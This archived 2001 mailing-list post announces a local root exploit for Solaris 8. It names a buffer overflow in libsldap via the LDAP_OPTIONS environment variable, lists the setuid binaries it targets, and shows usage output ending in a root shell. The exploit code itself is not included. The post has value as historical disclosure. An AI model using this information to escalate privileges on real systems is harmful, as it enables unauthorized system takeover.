Solaris 8 libsldap exploit

From: Noir Desir (noirat_private)
Date: Thu Jul 05 2001 - 04:14:09 PDT

    Hi,

    I wish to free this one since it has been made public by some
    ppl. libsldap hole has been
    known for long. As far as I know, swayat_private did actually found the
    hole several months
    ago and generously let me know about it. All propz goes to him. Thanks
    bro.

    Exploit is plain simple, tested on an Ultra10 and an Enterprise 3500 with
    success.
    I usually support the anti-sec movement but I got my reasons to publish
    the exploit.
    If you want to know why, please do mail me.

    $ ./libsldap-exp
    libsldap.so.1 $LDAP_OPTIONS enviroment variable buffer overflow
    Exploit code: noirat_private
    Bug discovery: swayat_private

    Usage: ./libsldap-exp target#

    target#: 0, /usr/bin/passwd Solaris8, Sparc64
    target#: 1, /usr/bin/nispasswd Solaris8, Sparc64
    target#: 2, /usr/bin/yppasswd Solaris8, Sparc64
    target#: 3, /usr/bin/chkey Solaris8, Sparc64
    target#: 4, /usr/lib/sendmail Solaris8, Sparc64
    $ ./libsldap-exp 0
    # id
    uid=0(root) gid=0(root)
    #

    PS: t(L)amer sahin kicina oyle bir tekme yiyeceksinki, agzindan cikicak.
    Haberin olsun istedim : )

    Greetings: sway, anathema, gov-boi, www.hack.co.za, ertan_kurt, cronos

    cheers,
    noir